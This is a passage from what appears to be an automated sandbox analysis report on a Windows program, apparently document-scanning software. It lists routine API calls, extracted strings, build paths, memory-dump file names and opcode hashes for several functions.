                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Error$DecrementIncrement$CriticalLastPolicySectionStatusValue$CloseEnterException@8FreeInformationLeaveMemoryOpenQueryThrow
                                                                                                • String ID: @fO$d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\useridentity.cpp$xMS$xMS$xMS
                                                                                                • API String ID: 2995429806-575894762
                                                                                                • Opcode ID: 439f43e1e13ad921da102d5a5fd65588812913820f81959b5e7ac3085a54f6cd
                                                                                                • Instruction ID: 35d29853aec7d891f947ef3ce06b7dc68a01ff711f4520e3bd9437d72c68f7dd
                                                                                                • Opcode Fuzzy Hash: 439f43e1e13ad921da102d5a5fd65588812913820f81959b5e7ac3085a54f6cd
                                                                                                • Instruction Fuzzy Hash: 5531AE71A00209AFDB119F99CD05BAFBFB4FF49704F1044AAF901A3291C7B95A04CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • IsWindow.USER32(?), ref: 00460347
                                                                                                • IsWindowVisible.USER32 ref: 00460374
                                                                                                • IsWindow.USER32(?), ref: 0046039C
                                                                                                • IsWindowVisible.USER32 ref: 004603C9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$CriticalSectionValueVisible$EnterException@8LeaveThrow
                                                                                                • String ID: @fO$@fO$@fO$@fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl$d:\build\teamagent\_work\1\s\0\awl\src\toolbarawl.cpp
                                                                                                • API String ID: 266305592-2733658124
                                                                                                • Opcode ID: df42c4775661f90e01290eb0002c1a7ef8ac4936b48e93ba3ef6adec13658f51
                                                                                                • Instruction ID: 8e15a6fd4113126321435a89d618ce62d001fc07aa858f42beb91937b4482b83
                                                                                                • Opcode Fuzzy Hash: df42c4775661f90e01290eb0002c1a7ef8ac4936b48e93ba3ef6adec13658f51
                                                                                                • Instruction Fuzzy Hash: 3551B1317043059BDB20DE29CC82B2F7795AB94745F04492FF985D73C1EAB8D8048A9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0042F910: IsWindow.USER32(?), ref: 0042F926
                                                                                                  • Part of subcall function 0042F910: GetClientRect.USER32 ref: 0042F972
                                                                                                  • Part of subcall function 0042F910: GetLastError.KERNEL32(?,00000000,00000009,?,0043ED7E,?,?,?,?,00000000,00000000,00000000,00000000,?), ref: 0042F97C
                                                                                                • IsWindow.USER32(?), ref: 004412A7
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004412D3
                                                                                                • GetMenu.USER32(?), ref: 004412E3
                                                                                                • IsWindow.USER32(00000000), ref: 0044139D
                                                                                                • EndDeferWindowPos.USER32(00000000,00000000,00000000,?,?,00000000,004E0C4E,000000FF), ref: 004413D7
                                                                                                • GetLastError.KERNEL32(?,?,00000000,004E0C4E,000000FF), ref: 004413E1
                                                                                                Strings
                                                                                                • AWL::CWindowGroupMover::~CWindowGroupMover, xrefs: 0044140A
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 004412B5
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\windowgroupmoverawl.cpp, xrefs: 00441400
                                                                                                • @fO, xrefs: 004412BF
                                                                                                • ::EndDeferWindowPos( dwp ) != 0, xrefs: 00441405
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$ErrorLast$ClientDeferLongMenuRect
                                                                                                • String ID: ::EndDeferWindowPos( dwp ) != 0$@fO$AWL::CWindowGroupMover::~CWindowGroupMover$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl$d:\build\teamagent\_work\1\s\0\awl\src\windowgroupmoverawl.cpp
                                                                                                • API String ID: 4248935088-3702769901
                                                                                                • Opcode ID: 779a924203e97e7da495219ceeec1d799e1b4c8ef74b639999a1c6e4afa21fbc
                                                                                                • Instruction ID: 7fa1616abe01ce19fae7bf5d021bcf856bf4459aed088af497524c839bb5de1c
                                                                                                • Opcode Fuzzy Hash: 779a924203e97e7da495219ceeec1d799e1b4c8ef74b639999a1c6e4afa21fbc
                                                                                                • Instruction Fuzzy Hash: E651D271A00205ABEF10DFA4DC41AABB7BCEF44740F14416AED05E76A2E778E990CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0046EA80: InterlockedIncrement.KERNEL32(00530380), ref: 0046EAB1
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 00410179
                                                                                                  • Part of subcall function 0046ACB0: InterlockedDecrement.KERNEL32(00000001), ref: 0046AD7D
                                                                                                  • Part of subcall function 00497A00: InterlockedDecrement.KERNEL32(00000008), ref: 00497A40
                                                                                                • InterlockedIncrement.KERNEL32(-00000006), ref: 004101FE
                                                                                                • InterlockedDecrement.KERNEL32(00000004), ref: 0041021C
                                                                                                • InterlockedDecrement.KERNEL32(00000008), ref: 004102C8
                                                                                                • InterlockedDecrement.KERNEL32(00000004), ref: 004102F5
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 00410310
                                                                                                Strings
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Errors.h, xrefs: 004101D2
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h, xrefs: 00410235
                                                                                                • @fO, xrefs: 004101DC
                                                                                                • @fO, xrefs: 0041023F
                                                                                                • xMS, xrefs: 00410319
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment$CriticalSectionValue$EnterException@8LeaveThrow
                                                                                                • String ID: @fO$@fO$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Errors.h$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h$xMS
                                                                                                • API String ID: 1491966972-4108246113
                                                                                                • Opcode ID: 1673d2a59341c83005dcd9c093bfd9a1b85fb57342e1fc8dd778c79d1501ed6d
                                                                                                • Instruction ID: 12c315b1c569dcbec36c5882affcf9b4dc541dcce19bcddd66d8aeea1ea6d315
                                                                                                • Opcode Fuzzy Hash: 1673d2a59341c83005dcd9c093bfd9a1b85fb57342e1fc8dd778c79d1501ed6d
                                                                                                • Instruction Fuzzy Hash: 1161B031600249EBDB20DB54CD49BEFBBA4BF44704F158599F905AB381DBB8EE40CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0046EA80: InterlockedIncrement.KERNEL32(00530380), ref: 0046EAB1
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0040F499
                                                                                                  • Part of subcall function 0046ACB0: InterlockedDecrement.KERNEL32(00000001), ref: 0046AD7D
                                                                                                  • Part of subcall function 00497A00: InterlockedDecrement.KERNEL32(00000008), ref: 00497A40
                                                                                                • InterlockedIncrement.KERNEL32(-00000006), ref: 0040F51E
                                                                                                • InterlockedDecrement.KERNEL32(00000004), ref: 0040F53C
                                                                                                • InterlockedDecrement.KERNEL32(00000008), ref: 0040F5E8
                                                                                                • InterlockedDecrement.KERNEL32(00000004), ref: 0040F615
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0040F630
                                                                                                Strings
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Errors.h, xrefs: 0040F4F2
                                                                                                • xMS, xrefs: 0040F639
                                                                                                • @fO, xrefs: 0040F55F
                                                                                                • @fO, xrefs: 0040F4FC
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h, xrefs: 0040F555
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment$CriticalSectionValue$EnterException@8LeaveThrow
                                                                                                • String ID: @fO$@fO$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Errors.h$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h$xMS
                                                                                                • API String ID: 1491966972-4108246113
                                                                                                • Opcode ID: d67fb93509fcc8d6cf4706347f8d64d7844ff1eedb6e11a10e79e85a2e0907e5
                                                                                                • Instruction ID: 528e0dfd8fb47f3808b953fe21534e1eb59b9610d194cca76dd5981c31ca0b08
                                                                                                • Opcode Fuzzy Hash: d67fb93509fcc8d6cf4706347f8d64d7844ff1eedb6e11a10e79e85a2e0907e5
                                                                                                • Instruction Fuzzy Hash: FA61C231600245EBDB20DF58CD49FAFBBA4AF44704F1545A9F505AB382D778EE04CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00435D80: IsWindow.USER32(?), ref: 00435D91
                                                                                                  • Part of subcall function 00435D80: MoveWindow.USER32(?,?,?,?,?,?,?,?,?,?,00450878,?), ref: 00435DDB
                                                                                                  • Part of subcall function 00435D80: GetLastError.KERNEL32(?,?,?,?,00450878,?), ref: 00435DE5
                                                                                                  • Part of subcall function 004362B0: IsWindow.USER32(?), ref: 004362C7
                                                                                                  • Part of subcall function 004362B0: GetWindowLongW.USER32(?,000000EC), ref: 004362EF
                                                                                                  • Part of subcall function 004362B0: IsWindow.USER32(?), ref: 004362FF
                                                                                                  • Part of subcall function 004362B0: GetWindowLongW.USER32(?,000000F0), ref: 00436327
                                                                                                  • Part of subcall function 00467530: MonitorFromRect.USER32(?,00000002), ref: 00467540
                                                                                                  • Part of subcall function 00467530: IsWindow.USER32(00000002), ref: 0046756B
                                                                                                  • Part of subcall function 00467530: SendMessageW.USER32(00000002,00000439,00000000,00000000), ref: 004675A1
                                                                                                • MonitorFromRect.USER32(?,00000002), ref: 004673E9
                                                                                                • MonitorFromRect.USER32(00000000,00000002), ref: 004673F6
                                                                                                • AnimateWindow.USER32(?,000000C8,00080000), ref: 00467443
                                                                                                • IsWindow.USER32(?), ref: 0046745F
                                                                                                • ShowWindow.USER32(?,00000008,?,00000001,?,?,?,?,?,?,?,?,?,00460AE4,?), ref: 0046748E
                                                                                                • IsWindow.USER32(?), ref: 004674E2
                                                                                                • SendMessageW.USER32(?,00000448,000000FF,00000000), ref: 00467518
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 00467470
                                                                                                • @fO, xrefs: 004674FD
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h, xrefs: 004674F3
                                                                                                • @fO, xrefs: 0046747A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$FromMonitorRect$LongMessageSend$AnimateErrorLastMoveShow
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl
                                                                                                • API String ID: 2835648192-3107405411
                                                                                                • Opcode ID: 2165c264a55c4420c4a0de83914bb4688ff9ebedbbfae214fe867894e6c11ee7
                                                                                                • Instruction ID: dae4675431e7157ecc1168376b54a64911f93370db1d0615fa7368dbddd3b99f
                                                                                                • Opcode Fuzzy Hash: 2165c264a55c4420c4a0de83914bb4688ff9ebedbbfae214fe867894e6c11ee7
                                                                                                • Instruction Fuzzy Hash: 33518271204301ABD710DF25CC46F6BB7E8AF98708F04862EB559A7291EB74E914CB9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(-+A), ref: 0041333F
                                                                                                • InterlockedDecrement.KERNEL32(00412B2D), ref: 00413474
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                  • Part of subcall function 004131C0: InterlockedIncrement.KERNEL32(00530380), ref: 004131F7
                                                                                                  • Part of subcall function 004131C0: InterlockedIncrement.KERNEL32(00530380), ref: 0041320C
                                                                                                  • Part of subcall function 004131C0: InterlockedIncrement.KERNEL32(00530380), ref: 0041321E
                                                                                                  • Part of subcall function 004131C0: InterlockedIncrement.KERNEL32(00530380), ref: 00413230
                                                                                                  • Part of subcall function 004131C0: InterlockedDecrement.KERNEL32(00530380), ref: 0041328F
                                                                                                  • Part of subcall function 004131C0: InterlockedDecrement.KERNEL32(00530380), ref: 004132AB
                                                                                                  • Part of subcall function 004131C0: InterlockedDecrement.KERNEL32(00530380), ref: 004132C7
                                                                                                  • Part of subcall function 004131C0: InterlockedDecrement.KERNEL32(00530380), ref: 004132E3
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 004133C0
                                                                                                • InterlockedDecrement.KERNEL32(00412B2D), ref: 004133C6
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004133E7
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00413404
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: -+A$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 2574743344-713718581
                                                                                                • Opcode ID: 8bcb761ab2f3183ddfdfa0fd5b72630b9edee43da26b4e2896bd10b18dd281d5
                                                                                                • Instruction ID: 890659845f5b63074c44578e3b4eacb74ce531fced0207278a3f1576f8845891
                                                                                                • Opcode Fuzzy Hash: 8bcb761ab2f3183ddfdfa0fd5b72630b9edee43da26b4e2896bd10b18dd281d5
                                                                                                • Instruction Fuzzy Hash: 4D419D31600609AFCF05EF68CC51AEE7BA8AF49745F004169F505A7291DB38EF85CBD9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0041E0ED
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0041E14B
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0041E1AA
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0041E208
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: Profile file: $Scan Settings: $xMS$xMS$xMS$xMS$~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                                                                • API String ID: 2574743344-1395920199
                                                                                                • Opcode ID: 799237fd93ddc4c86fc699c8487f6ed69c4388bafdf2c6e0befecac629d5f418
                                                                                                • Instruction ID: 505db42bc161d9860ab133b6a3dbf54a4e4b2dcdc8e368acb368d98725cee913
                                                                                                • Opcode Fuzzy Hash: 799237fd93ddc4c86fc699c8487f6ed69c4388bafdf2c6e0befecac629d5f418
                                                                                                • Instruction Fuzzy Hash: C441AF75A41A29BBCB21AF55CC02BAF7765AF40B20F14461AFD143B3C1CB78AE4187C9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00535528,0053011C), ref: 0048721E
                                                                                                  • Part of subcall function 00489DD0: TlsGetValue.KERNEL32(0053011C,?,?,00487239), ref: 00489DF1
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0048729B
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 0048732F
                                                                                                • LeaveCriticalSection.KERNEL32(00535528,?,00000000,?,00535564), ref: 004873D0
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 00487405
                                                                                                  • Part of subcall function 004694E0: SetLastError.KERNEL32(00000000,0050A1F4,?,74E070F0,?,004873B6,?), ref: 00469529
                                                                                                  • Part of subcall function 004694E0: LoadStringW.USER32(00483AA0,?,-0000000C,0000007F), ref: 0046958F
                                                                                                  • Part of subcall function 004694E0: GetLastError.KERNEL32(?,?,?,?,?,004873B6,?), ref: 004695E1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$CriticalDecrementErrorLastSection$EnterIncrementLeaveLoadStringValue
                                                                                                • String ID: (US$@fO$@fO$d:\build\teamagent\_work\1\s\0\fineobjects\inc\object.h$dUS
                                                                                                • API String ID: 3440685220-635460984
                                                                                                • Opcode ID: 6c70607dd982662d99144bf318178d86989caa535c92b229ef88acf9916c2c0b
                                                                                                • Instruction ID: fe0df19d0290c4165fb3ad6c0bcdf6d8ba63a30e0494ebf8da93f655ceaeaf24
                                                                                                • Opcode Fuzzy Hash: 6c70607dd982662d99144bf318178d86989caa535c92b229ef88acf9916c2c0b
                                                                                                • Instruction Fuzzy Hash: F0611631A04200DFDB10EF68C959B6F7BA5BF50704F28495AEC14AB392D779ED04CB9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0042AA40: InterlockedDecrement.KERNEL32(?), ref: 0042AB14
                                                                                                  • Part of subcall function 0042AA40: InterlockedDecrement.KERNEL32(?), ref: 0042AB30
                                                                                                  • Part of subcall function 0042AA40: InterlockedDecrement.KERNEL32(?), ref: 0042AB4C
                                                                                                  • Part of subcall function 0042AA40: InterlockedDecrement.KERNEL32(?), ref: 0042AB68
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00427419
                                                                                                • InterlockedDecrement.KERNEL32(0000180F), ref: 00427438
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004274F9
                                                                                                • InterlockedDecrement.KERNEL32(0000180F), ref: 0042751C
                                                                                                  • Part of subcall function 00469600: InterlockedIncrement.KERNEL32(00530380), ref: 00469637
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: not setting threshold. using threshold value(default): $setting threshold. threshold value: $xMS$xMS$xMS$xMS
                                                                                                • API String ID: 2574743344-4033113748
                                                                                                • Opcode ID: 74a2079dcd26e45ffcc60fd4e06f870fa078ed72b2052681ad81bdc4fc24b739
                                                                                                • Instruction ID: 0be04a1a80ce9a7afb61eb5ce4a4ecf0a26730b7ba60149c99b309fdd82c2d64
                                                                                                • Opcode Fuzzy Hash: 74a2079dcd26e45ffcc60fd4e06f870fa078ed72b2052681ad81bdc4fc24b739
                                                                                                • Instruction Fuzzy Hash: 0751C471A00625ABCB11EF64D815BAFBB75BF44714F14822EE805A7381DB78AE018B99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • FindResourceW.KERNEL32(00000000,00000000,000000F1,00000000,000000F1,?,?,?,?,004DB3C5,000000FF,?,0044C30E,?,?,00000000), ref: 0044C4A8
                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,004DB3C5,000000FF,?,0044C30E,?,?,00000000), ref: 0044C4D5
                                                                                                • LockResource.KERNEL32(00000000,?,?,?,?,004DB3C5,000000FF,?,0044C30E,?,?,00000000), ref: 0044C501
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                  • Part of subcall function 00436620: TlsGetValue.KERNEL32(74E070E4,00000000,00000001,74E070F0,00000001,004DEA56,000000FF,?,0046A447,00000001,74E070F0,00000001,?,004E2A2C), ref: 00436651
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ResourceValue$CriticalSection$EnterException@8FindLeaveLoadLockThrow
                                                                                                • String ID: @fO$@fO$@fO$@fO$@fO$@fO$d:\build\teamagent\_work\1\s\0\awl\src\multiimagelistcollectionawl.cpp
                                                                                                • API String ID: 4081024241-2382631244
                                                                                                • Opcode ID: b855f7f0a7d2fe47adc3279431393821e6558e0a2dcefc021b9a3af26b638eb8
                                                                                                • Instruction ID: 0fc44a885505b44b9fe6fd5027ab577527e096b95ded1beb6543bb40bf021dc3
                                                                                                • Opcode Fuzzy Hash: b855f7f0a7d2fe47adc3279431393821e6558e0a2dcefc021b9a3af26b638eb8
                                                                                                • Instruction Fuzzy Hash: D751E570640325ABEB249F28CD92B7B77A1EB44700F15C52AF949DB3C1EB79E84087C8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00000170,?,?,00000000), ref: 0049C228
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0049C279
                                                                                                • SetEvent.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0049C320
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0049C349
                                                                                                • LeaveCriticalSection.KERNEL32(00000170,?,00000000,00000000,00000000), ref: 0049C36D
                                                                                                • LeaveCriticalSection.KERNEL32(00000170,?,00000000,00000000,00000000), ref: 0049C3AA
